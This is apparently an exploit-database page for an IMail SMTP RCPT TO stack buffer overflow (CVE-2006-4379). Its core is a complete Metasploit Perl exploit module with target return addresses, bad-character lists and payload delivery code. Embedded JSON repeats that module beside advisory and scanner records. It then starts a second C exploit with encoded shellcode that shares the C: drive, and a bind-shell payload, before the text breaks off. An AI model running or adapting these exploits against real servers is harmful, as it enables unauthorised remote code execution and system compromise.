Search...

Imail 8.10-8.12 RCPT TO Remote Buffer Overflow Exploit meta

2007-02-04T00:00:00

ID EDB-ID:3265
Type exploitdb
Reporter Jacopo Cervini
Modified 2007-02-04T00:00:00

Description

Imail 8.10-8.12 (RCPT TO) Remote Buffer Overflow Exploit (meta). CVE-2006-4379. Remote exploit for windows platform

                                        
                                            ## 
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::imail_smtp_rcpt_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };

my $info = {
	'Name'    =&gt; 'IMail 2006 and 8.x SMTP Stack Overflow Exploit',
	'Version'  =&gt; '$Revision: 1.0 $',
	'Authors' =&gt; [ 'Jacopo Cervini &lt;acaro [at] jervus.it&gt;', ],
	'Arch'    =&gt; [ 'x86' ],
	'OS'      =&gt; [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
	'Priv'    =&gt; 1,

	'UserOpts'  =&gt;
	  {
		'RHOST' =&gt; [1, 'ADDR', 'The target address'],
		'RPORT' =&gt; [1, 'PORT', 'The target port', 25],
		'Encoder'   =&gt; [1, 'EncodedPayload', 'Use Pex!!'],

		
	  },

	'AutoOpts'  =&gt; { 'EXITFUNC'  =&gt; 'seh' },
	'Payload' =&gt;
	  {
		'Space'     =&gt; 400,
		'BadChars'  =&gt; "\x00\x0d\x0a\x20\x3e\x22\x40",
		'Keys'      =&gt; ['+ws2ord'],
		

	  },

	'Description'  =&gt; Pex::Text::Freeform(qq{
This module exploits a stack based buffer overflow in IMail 2006 and 8.x SMTP service.
If we send a long strings for RCPT TO command contained within the characters '@' and ':'
we can overwrite the eip register and exploit the vulnerable smpt service
}),

	'Refs'  =&gt;
	  [
		['BID', '19885'],
		['CVE', '2006-4379'],
		['URL',   'http://www.zerodayinitiative.com/advisories/ZDI-06-028.html'],
	  ],

	'Targets' =&gt;
	  [

	['Universal IMail 8.10',0x100188c3 ], # pop eax, ret in SmtpDLL.dll for IMail 8.10
	['Universal IMail 8.12',0x100191c4 ], # pop eax, ret in SmtpDLL.dll for IMail 8.12


	  ],

	'DefaultTarget' =&gt; 0,

	'Keys' =&gt; ['smtp'],

	'DisclosureDate' =&gt; 'September 7 2006',
  };

sub new {
	my $class = shift;
	my $self = $class-&gt;SUPER::new({'Info' =&gt; $info, 'Advanced' =&gt; $advanced}, @_);

	return($self);
}

sub Exploit {
	my $self = shift;
	my $target_host = $self-&gt;GetVar('RHOST');
	my $target_port = $self-&gt;GetVar('RPORT');
	my $target_idx  = $self-&gt;GetVar('TARGET');
	my $shellcode   = $self-&gt;GetVar('EncodedPayload')-&gt;Payload;

	my $target = $self-&gt;Targets-&gt;[$target_idx];



	my $ehlo = "EHLO " . "\r\n";

	my $mail_from = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" . "\x3e" . "\r\n";


	my $pattern = "\x20\x3c\x40";
	$pattern .= pack('V', $target-&gt;[1]);
	$pattern .="\x3a" . $self-&gt;MakeNops((0x1e8-length ($shellcode)));
	$pattern .= $shellcode;
	$pattern .= "\x4a\x61\x63\x3e"; 

	my $request = "RCPT TO: " . $pattern ."\n";

	$self-&gt;PrintLine(sprintf ("[*] Trying ".$target-&gt;[0]." using pop eax, ret at 0x%.8x...", $target-&gt;[1]));

	my $s = Msf::Socket::Tcp-&gt;new
	  (
		'PeerAddr'  =&gt; $target_host,
		'PeerPort'  =&gt; $target_port,
		'LocalPort' =&gt; $self-&gt;GetVar('CPORT'),
		'SSL'       =&gt; $self-&gt;GetVar('SSL'),
	  );

	if ($s-&gt;IsError) {
		$self-&gt;PrintLine('[*] Error creating socket: ' . $s-&gt;GetError);
		return;
	}
my $r = $s-&gt;Recv(-1, 5);

	$s-&gt;Send($ehlo);
	$self-&gt;PrintLine("[*] I'm sending ehlo command");
	$self-&gt;PrintLine("[*] $r");
	sleep(2);
		
	$s-&gt;Send($mail_from);
	$self-&gt;PrintLine("[*] I'm sending mail from command");
	$r = $s-&gt;Recv(-1, 10);
	$self-&gt;PrintLine("[*] $r");
	sleep(2);

	$s-&gt;Send($request);
	$self-&gt;PrintLine("[*] I'm sending rcpt to command");
	sleep(2);

	return;
}

# milw0rm.com [2007-02-04]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:3265", "hash": "01fd31a554733e92c51e1c0f4135a3c0", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Imail 8.10-8.12 RCPT TO Remote Buffer Overflow Exploit meta", "description": "Imail 8.10-8.12 (RCPT TO) Remote Buffer Overflow Exploit (meta). CVE-2006-4379. Remote exploit for windows platform", "published": "2007-02-04T00:00:00", "modified": "2007-02-04T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/3265/", "reporter": "Jacopo Cervini", "references": [], "cvelist": ["CVE-2006-4379"], "lastseen": "2016-01-31T18:05:26", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4379"]}, {"type": "canvas", "idList": ["IMAIL_RCPTOVERFLOW"]}, {"type": "zdi", "idList": ["ZDI-06-028"]}, {"type": "osvdb", "idList": ["OSVDB:28576"]}, {"type": "saint", "idList": ["SAINT:E37DDFF59A1E227DF4B47DCC85F5D059", "SAINT:4DE1AB6F5F9AA27FADB8EB2DA87D3E08", "SAINT:3E21A071B66E8A04574166D9F5116C55"]}, {"type": "exploitdb", "idList": ["EDB-ID:2601"]}, {"type": "cert", "idList": ["VU:542197"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:14189"]}, {"type": "nessus", "idList": ["IPSWITCH_IMAIL_2006.1.NASL"]}], "modified": "2016-01-31T18:05:26"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/3265/", "sourceData": "## \r\n# This file is part of the Metasploit Framework and may be redistributed\r\n# according to the licenses defined in the Authors field below. In the\r\n# case of an unknown or missing license, this file defaults to the same\r\n# license as the core Framework (dual GPLv2 and Artistic). The latest\r\n# version of the Framework can always be obtained from metasploit.com.\r\n##\r\n\r\npackage Msf::Exploit::imail_smtp_rcpt_overflow;\r\nuse base \"Msf::Exploit\";\r\nuse strict;\r\nuse Pex::Text;\r\nmy $advanced = { };\r\n\r\nmy $info = {\r\n\t'Name' => 'IMail 2006 and 8.x SMTP Stack Overflow Exploit',\r\n\t'Version' => '$Revision: 1.0 $',\r\n\t'Authors' => [ 'Jacopo Cervini <acaro [at] jervus.it>', ],\r\n\t'Arch' => [ 'x86' ],\r\n\t'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],\r\n\t'Priv' => 1,\r\n\r\n\t'UserOpts' =>\r\n\t {\r\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\r\n\t\t'RPORT' => [1, 'PORT', 'The target port', 25],\r\n\t\t'Encoder' => [1, 'EncodedPayload', 'Use Pex!!'],\r\n\r\n\t\t\r\n\t },\r\n\r\n\t'AutoOpts' => { 'EXITFUNC' => 'seh' },\r\n\t'Payload' =>\r\n\t {\r\n\t\t'Space' => 400,\r\n\t\t'BadChars' => \"\\x00\\x0d\\x0a\\x20\\x3e\\x22\\x40\",\r\n\t\t'Keys' => ['+ws2ord'],\r\n\t\t\r\n\r\n\t },\r\n\r\n\t'Description' => Pex::Text::Freeform(qq{\r\nThis module exploits a stack based buffer overflow in IMail 2006 and 8.x SMTP service.\r\nIf we send a long strings for RCPT TO command contained within the characters '@' and ':'\r\nwe can overwrite the eip register and exploit the vulnerable smpt service\r\n}),\r\n\r\n\t'Refs' =>\r\n\t [\r\n\t\t['BID', '19885'],\r\n\t\t['CVE', '2006-4379'],\r\n\t\t['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-06-028.html'],\r\n\t ],\r\n\r\n\t'Targets' =>\r\n\t [\r\n\r\n\t['Universal IMail 8.10',0x100188c3 ], # pop eax, ret in SmtpDLL.dll for IMail 8.10\r\n\t['Universal IMail 8.12',0x100191c4 ], # pop eax, ret in SmtpDLL.dll for IMail 8.12\r\n\r\n\r\n\t ],\r\n\r\n\t'DefaultTarget' => 0,\r\n\r\n\t'Keys' => ['smtp'],\r\n\r\n\t'DisclosureDate' => 'September 7 2006',\r\n };\r\n\r\nsub new {\r\n\tmy $class = shift;\r\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\r\n\r\n\treturn($self);\r\n}\r\n\r\nsub Exploit {\r\n\tmy $self = shift;\r\n\tmy $target_host = $self->GetVar('RHOST');\r\n\tmy $target_port = $self->GetVar('RPORT');\r\n\tmy $target_idx = $self->GetVar('TARGET');\r\n\tmy $shellcode = $self->GetVar('EncodedPayload')->Payload;\r\n\r\n\tmy $target = $self->Targets->[$target_idx];\r\n\r\n\r\n\r\n\tmy $ehlo = \"EHLO \" . \"\\r\\n\";\r\n\r\n\tmy $mail_from = \"MAIL FROM:\" . \"\\x20\" . \"\\x3c\".\"acaro\". \"\\x40\".\"jervus.it\" . \"\\x3e\" . \"\\r\\n\";\r\n\r\n\r\n\tmy $pattern = \"\\x20\\x3c\\x40\";\r\n\t$pattern .= pack('V', $target->[1]);\r\n\t$pattern .=\"\\x3a\" . $self->MakeNops((0x1e8-length ($shellcode)));\r\n\t$pattern .= $shellcode;\r\n\t$pattern .= \"\\x4a\\x61\\x63\\x3e\"; \r\n\r\n\tmy $request = \"RCPT TO: \" . $pattern .\"\\n\";\r\n\r\n\t$self->PrintLine(sprintf (\"[*] Trying \".$target->[0].\" using pop eax, ret at 0x%.8x...\", $target->[1]));\r\n\r\n\tmy $s = Msf::Socket::Tcp->new\r\n\t (\r\n\t\t'PeerAddr' => $target_host,\r\n\t\t'PeerPort' => $target_port,\r\n\t\t'LocalPort' => $self->GetVar('CPORT'),\r\n\t\t'SSL' => $self->GetVar('SSL'),\r\n\t );\r\n\r\n\tif ($s->IsError) {\r\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\r\n\t\treturn;\r\n\t}\r\nmy $r = $s->Recv(-1, 5);\r\n\r\n\t$s->Send($ehlo);\r\n\t$self->PrintLine(\"[*] I'm sending ehlo command\");\r\n\t$self->PrintLine(\"[*] $r\");\r\n\tsleep(2);\r\n\t\t\r\n\t$s->Send($mail_from);\r\n\t$self->PrintLine(\"[*] I'm sending mail from command\");\r\n\t$r = $s->Recv(-1, 10);\r\n\t$self->PrintLine(\"[*] $r\");\r\n\tsleep(2);\r\n\r\n\t$s->Send($request);\r\n\t$self->PrintLine(\"[*] I'm sending rcpt to command\");\r\n\tsleep(2);\r\n\r\n\treturn;\r\n}\r\n\r\n# milw0rm.com [2007-02-04]\r\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2018-10-18T15:05:37", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in the SMTP Daemon in Ipswitch Collaboration 2006 Suite Premium and Standard Editions, IMail, IMail Plus, and IMail Secure allows remote attackers to execute arbitrary code via a long string located after an '@' character and before a ':' character.", "modified": "2018-10-17T17:36:48", "published": "2006-09-08T17:04:00", "id": "CVE-2006-4379", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4379", "title": "CVE-2006-4379", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:09:23", "bulletinFamily": "scanner", "description": "The remote host is running Ipswitch Collaboration Suite / IMail Secure Server / IMail Server, commercial messaging and collaboration suites for Windows.\n\nAccording to its banner, the version of Ipswitch Collaboration Suite / IMail Secure Server / IMail Server installed on the remote host has a stack-based buffer overflow in its SMTP server component that can be triggered by long strings within the characters '@' and ':'. An unauthenticated attacker may be able to leverage this flaw to crash the SMTP service or even to execute arbitrary code remotely.", "modified": "2018-11-15T00:00:00", "id": "IPSWITCH_IMAIL_2006.1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22314", "published": "2006-09-08T00:00:00", "title": "Ipswitch IMail Server SMTP Service Crafted RCPT String Remote Overflow", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22314);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\"CVE-2006-4379\");\n script_bugtraq_id(19885);\n\n script_name(english:\"Ipswitch IMail Server SMTP Service Crafted RCPT String Remote Overflow\");\n script_summary(english:\"Checks version of Ipswitch IMail\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SMTP server is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Ipswitch Collaboration Suite / IMail Secure\nServer / IMail Server, commercial messaging and collaboration suites\nfor Windows.\n\nAccording to its banner, the version of Ipswitch Collaboration Suite /\nIMail Secure Server / IMail Server installed on the remote host has a\nstack-based buffer overflow in its SMTP server component that can be\ntriggered by long strings within the characters '@' and ':'. An\nunauthenticated attacker may be able to leverage this flaw to crash\nthe SMTP service or even to execute arbitrary code remotely.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-06-028/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2006/Sep/93\");\n script_set_attribute(attribute:\"see_also\", value:\"https://community.ipswitch.com/s/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.ipswitch.com/support/imail/releases/im20061.asp\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2006.1 of the appropriate application.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/09/08\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/09/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2006/09/06\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ipswitch:imail\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SMTP problems\");\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"smtpserver_detect.nasl\");\n script_require_ports(\"Services/smtp\", 25);\n exit(0);\n}\n\n\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\n\nport = get_service(svc:\"smtp\", default: 25, exit_on_fail: 1);\nif (get_kb_item('SMTP/'+port+'/broken')) exit(0);\n\n\n# Pull the version from the banner.\nbanner = get_smtp_banner(port:port);\nif (banner && \" (IMail \" >< banner)\n{\n pat = \"^[0-9][0-9][0-9] .+ \$IMail ([0-9.]+) [0-9]+-[0-9]+\$ NT-ESMTP Server\";\n matches = egrep(pattern:pat, string:banner);\n if (matches) {\n foreach match (split(matches)) {\n match = chomp(match);\n ver = eregmatch(pattern:pat, string:match);\n if (!isnull(ver)) {\n ver = ver[1];\n break;\n }\n }\n }\n\n # There's a problem if it's < 9.1 (== 2006.1).\n if (ver && ver =~ \"^([0-8]\\.|9\\.0)\")\n security_hole(port);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdi": [{"lastseen": "2016-11-09T00:18:16", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Ipswitch Collaboration Suite and IMail. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the SMTP daemon. A lack of bounds checking during the parsing of long strings contained within the characters '@' and ':' leads to a stack overflow vulnerability. Exploitation can result in code execution or a denial of service.", "modified": "2006-11-09T00:00:00", "published": "2006-09-08T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-06-028", "id": "ZDI-06-028", "title": "Ipswitch Collaboration Suite SMTP Server Stack Overflow Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "canvas": [{"lastseen": "2016-09-25T14:13:15", "bulletinFamily": "exploit", "description": "**Name**| imail_rcptoverflow \n---|--- \n**CVE**| CVE-2006-4379 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| IMail SMTPD32 Stack Overflow \n**Notes**| CVE Name: CVE-2006-4379 \nVENDOR: IPSwitch \nPost-exploitaion: Post-exploitation requires stoping and starting the IMail SMTP Server Service \nFrom a different process (use injectprocess to get a new listener) runcommand: net stop \"IMail SMTP Server\" \nnet start \"IMail SMTP Server\" \nPlatforms Tested: Windows 2000 SP4 (English) IMail 8.13 \n \nDate public: 2006-09-07 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4379 \nCVSS: 7.5 \n\n", "modified": "2006-09-08T17:04:00", "published": "2006-09-08T17:04:00", "id": "IMAIL_RCPTOVERFLOW", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/imail_rcptoverflow", "type": "canvas", "title": "Immunity Canvas: IMAIL_RCPTOVERFLOW", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "saint": [{"lastseen": "2018-08-31T00:08:17", "bulletinFamily": "exploit", "description": "Added: 09/29/2006 \nCVE: [CVE-2006-4379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4379>) \nBID: [19885](<http://www.securityfocus.com/bid/19885>) \nOSVDB: [28576](<http://www.osvdb.org/28576>) \n\n\n### Background\n\n[IMail](<http://www.ipswitch.com/products/imail/index.asp>) is an e-mail server for Windows platforms. \n\n### Problem\n\nA buffer overflow vulnerability in the SMTP daemon allows remote command execution by sending a `**RCPT TO**` argument containing a long string between `**@**` and `**:**` characters. \n\n### Resolution\n\n[Upgrade](<http://www.ipswitch.com/support/imail/patch-upgrades.asp>) to IMail 2006.1 or higher. \n\n### References\n\n<http://www.securityfocus.com/archive/1/445521> \n\n\n### Limitations\n\nExploit works with IMail Server 8.10. Exploitation requires that the server have a fixed IP address. Due to the nature of the vulnerability, the success of the exploit may depend on the state of the target system. \n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "modified": "2006-09-29T00:00:00", "published": "2006-09-29T00:00:00", "id": "SAINT:E37DDFF59A1E227DF4B47DCC85F5D059", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/imail_smtp_rcpt_to", "title": "IMail SMTP RCPT TO buffer overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-14T16:58:05", "bulletinFamily": "exploit", "description": "Added: 09/29/2006 \nCVE: [CVE-2006-4379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4379>) \nBID: [19885](<http://www.securityfocus.com/bid/19885>) \nOSVDB: [28576](<http://www.osvdb.org/28576>) \n\n\n### Background\n\n[IMail](<http://www.ipswitch.com/products/imail/index.asp>) is an e-mail server for Windows platforms. \n\n### Problem\n\nA buffer overflow vulnerability in the SMTP daemon allows remote command execution by sending a `**RCPT TO**` argument containing a long string between `**@**` and `**:**` characters. \n\n### Resolution\n\n[Upgrade](<http://www.ipswitch.com/support/imail/patch-upgrades.asp>) to IMail 2006.1 or higher. \n\n### References\n\n<http://www.securityfocus.com/archive/1/445521> \n\n\n### Limitations\n\nExploit works with IMail Server 8.10. Exploitation requires that the server have a fixed IP address. Due to the nature of the vulnerability, the success of the exploit may depend on the state of the target system. \n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "modified": "2006-09-29T00:00:00", "published": "2006-09-29T00:00:00", "id": "SAINT:4DE1AB6F5F9AA27FADB8EB2DA87D3E08", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/imail_smtp_rcpt_to", "type": "saint", "title": "IMail SMTP RCPT TO buffer overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-10-03T15:01:55", "bulletinFamily": "exploit", "description": "Added: 09/29/2006 \nCVE: [CVE-2006-4379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4379>) \nBID: [19885](<http://www.securityfocus.com/bid/19885>) \nOSVDB: [28576](<http://www.osvdb.org/28576>) \n\n\n### Background\n\n[IMail](<http://www.ipswitch.com/products/imail/index.asp>) is an e-mail server for Windows platforms. \n\n### Problem\n\nA buffer overflow vulnerability in the SMTP daemon allows remote command execution by sending a `**RCPT TO**` argument containing a long string between `**@**` and `**:**` characters. \n\n### Resolution\n\n[Upgrade](<http://www.ipswitch.com/support/imail/patch-upgrades.asp>) to IMail 2006.1 or higher. \n\n### References\n\n<http://www.securityfocus.com/archive/1/445521> \n\n\n### Limitations\n\nExploit works with IMail Server 8.10. Exploitation requires that the server have a fixed IP address. Due to the nature of the vulnerability, the success of the exploit may depend on the state of the target system. \n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "modified": "2006-09-29T00:00:00", "published": "2006-09-29T00:00:00", "id": "SAINT:3E21A071B66E8A04574166D9F5116C55", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/imail_smtp_rcpt_to", "type": "saint", "title": "IMail SMTP RCPT TO buffer overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:19", "bulletinFamily": "software", "description": "ZDI-06-028: Ipswitch Collaboration Suite SMTP Server Stack Overflow\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-06-028.html\r\nSeptember 7, 2006\r\n\r\n-- CVE ID:\r\nCVE-2006-4379\r\n\r\n-- Affected Vendor:\r\nIpswitch\r\n\r\n-- Affected Products:\r\nICS/IMail Server 2006\r\n\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability since August 31, 2006 by Digital Vaccine protection\r\nfilter ID 4496. For further product information on the TippingPoint IPS:\r\n\r\n http://www.tippingpoint.com \r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Ipswitch Collaboration Suite and IMail.\r\nAuthentication is not required to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the SMTP daemon. A lack of bounds\r\nchecking during the parsing of long strings contained within the\r\ncharacters '@' and ':' leads to a stack overflow vulnerability.\r\nExploitation can result in code execution or a denial of service.\r\n\r\n-- Vendor Response:\r\nIpswitch has issued an update, version 2006.1, to correct this\r\nvulnerability. More details can be found at:\r\n\r\nhttp://www.ipswitch.com/support/imail/releases/im20061.asp\r\n\r\n-- Disclosure Timeline:\r\n2006.06.22 - Vulnerability reported to vendor\r\n2006.08.31 - Digital Vaccine released to TippingPoint customers\r\n2006.09.07 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by an anonymous researcher.\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, a division of 3Com, The Zero Day Initiative\r\n(ZDI) represents a best-of-breed model for rewarding security\r\nresearchers for responsibly disclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is used.\r\n3Com does not re-sell the vulnerability details or any exploit code.\r\nInstead, upon notifying the affected product vendor, 3Com provides its\r\ncustomers with zero day protection through its intrusion prevention\r\ntechnology. Explicit details regarding the specifics of the\r\nvulnerability are not exposed to any parties until an official vendor\r\npatch is publicly available. Furthermore, with the altruistic aim of\r\nhelping to secure a broader user base, 3Com provides this vulnerability\r\ninformation confidentially to security vendors (including competitors)\r\nwho have a vulnerability protection or mitigation product.\r\n", "modified": "2006-09-08T00:00:00", "published": "2006-09-08T00:00:00", "id": "SECURITYVULNS:DOC:14189", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14189", "title": "ZDI-06-028: Ipswitch Collaboration Suite SMTP Server Stack Overflow", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.ipswitch.com/support/ics/updates/ics20061.asp)\n[Secunia Advisory ID:21795](https://secuniaresearch.flexerasoftware.com/advisories/21795/)\nOther Advisory URL: http://www.juniper.net/security/auto/vulnerabilities/vuln3414.html\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-028.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-09/0093.html\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2601\nFrSIRT Advisory: ADV-2006-3496\n[CVE-2006-4379](https://vulners.com/cve/CVE-2006-4379)\nBugtraq ID: 19885\n", "modified": "2006-09-07T06:03:59", "published": "2006-09-07T06:03:59", "href": "https://vulners.com/osvdb/OSVDB:28576", "id": "OSVDB:28576", "type": "osvdb", "title": "Ipswitch IMail Server SMTP Service Crafted RCPT String Remote Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T16:38:21", "bulletinFamily": "exploit", "description": "Ipswitch IMail Server 2006 / 8.x (RCPT) Remote Stack Overflow Exploit. CVE-2006-4379. Remote exploit for windows platform", "modified": "2006-10-19T00:00:00", "published": "2006-10-19T00:00:00", "id": "EDB-ID:2601", "href": "https://www.exploit-db.com/exploits/2601/", "type": "exploitdb", "title": "Ipswitch IMail Server 2006 / 8.x RCPT Remote Stack Overflow Exploit", "sourceData": "// IMail 2006 and 8.x SMTP Stack Overflow Exploit\n// coded by Greg Linares [glinares.code[at]gmail[dot]com\n// http://www.juniper.net/security/auto/vulnerabilities/vuln3414.html\n// This works on the following versions:\n// 2006 IMail prior to 2006.1 update\n\n\n#include <stdio.h>\n#include <string.h>\n#include <windows.h>\n#include <winsock.h>\n\n#pragma comment(lib,\"wsock32.lib\")\n\nint main(int argc, char *argv[])\n{\nstatic char overflow[1028];\n\n\n\n// PAYLOADS\n// Restricted Chars = 0x00 0x0D 0x0A 0x20 0x3e 0x22 (Maybe More)\n\n/* win32_exec - EXITFUNC=seh CMD=net share Export=C:\\ /unlimited Size=188 Encoder=ShikataGaNai http://metasploit.com */\nunsigned char RootShare[] =\n\"\\xdb\\xcb\\x29\\xc9\\xba\\xfa\\xef\\x47\\x2b\\xb1\\x2a\\xd9\\x74\\x24\\xf4\\x58\"\n\"\\x31\\x50\\x17\\x83\\xc0\\x04\\x03\\xaa\\xfc\\xa5\\xde\\xb6\\xeb\\x6e\\x21\\x46\"\n\"\\xec\\xe5\\x64\\x7a\\x67\\x85\\x63\\xfa\\x76\\x99\\xe7\\xb5\\x60\\xee\\xa7\\x69\"\n\"\\x90\\x1b\\x1e\\xe2\\xa6\\x50\\xa0\\x1a\\xf7\\xa6\\x3a\\x4e\\x7c\\xe6\\x49\\x89\"\n\"\\xbc\\x2d\\xbc\\x94\\xfc\\x59\\x4b\\xad\\x54\\xba\\xb0\\xa4\\xb1\\x49\\xe7\\x62\"\n\"\\x3b\\xa5\\x7e\\xe1\\x37\\x72\\xf4\\xaa\\x5b\\x85\\xe1\\xdf\\x78\\x0e\\xf4\\x34\"\n\"\\x09\\x4c\\xd3\\xce\\xc9\\x5c\\xdb\\xaa\\x46\\xde\\xeb\\xb7\\x99\\xa7\\x07\\x3c\"\n\"\\x59\\x54\\x93\\x32\\x46\\xc9\\x28\\xda\\x7e\\xfa\\x26\\x91\\xff\\x4c\\x38\\xa5\"\n\"\\xff\\x27\\x51\\x99\\xa0\\x06\\x54\\x81\\x08\\xe0\\x60\\xc2\\x75\\x89\\xc0\\xac\"\n\"\\x85\\xe4\\xe5\\x73\\x0e\\x61\\x1b\\x01\\xc0\\xc6\\x1b\\xf2\\xb3\\x8d\\x97\\xdc\"\n\"\\x38\\x26\\x39\\x6e\\xda\\x96\\xfc\\xf6\\x54\\xb8\\x8c\\x72\\xa8\\x05\\x4b\\x26\"\n\"\\xf2\\xa6\\xde\\xb8\\x9e\\xd1\\x4d\\x2d\\x2b\\x47\\xea\\xad\";\n\n\n/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=Pex http://metasploit.com */\nunsigned char Win32Bind[] 